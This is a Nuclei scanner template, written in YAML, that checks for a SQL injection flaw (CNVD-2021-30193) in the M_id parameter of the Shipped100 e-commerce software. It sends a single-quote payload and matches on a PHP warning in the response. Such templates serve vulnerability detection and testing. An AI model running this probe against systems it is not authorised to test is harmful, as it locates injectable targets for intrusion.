id: Shipped100-sqli

info:
  name: 帝发货100 M_id SQL注入漏洞（CNVD-2021-30193）
  author: str1am
  severity: high
  reference:
    - https://github.com/meljith-lab/mcon1/blob/821445cc974234cc6ce7367bc7fbcc4d6eb8aea5/yournuclei/shipped100-210609-054716.yaml
  tags: Shipped100,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?M_id=1%27&type=product"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        words:
          - "<b>Warning</b>"
        part: body
        condition: and
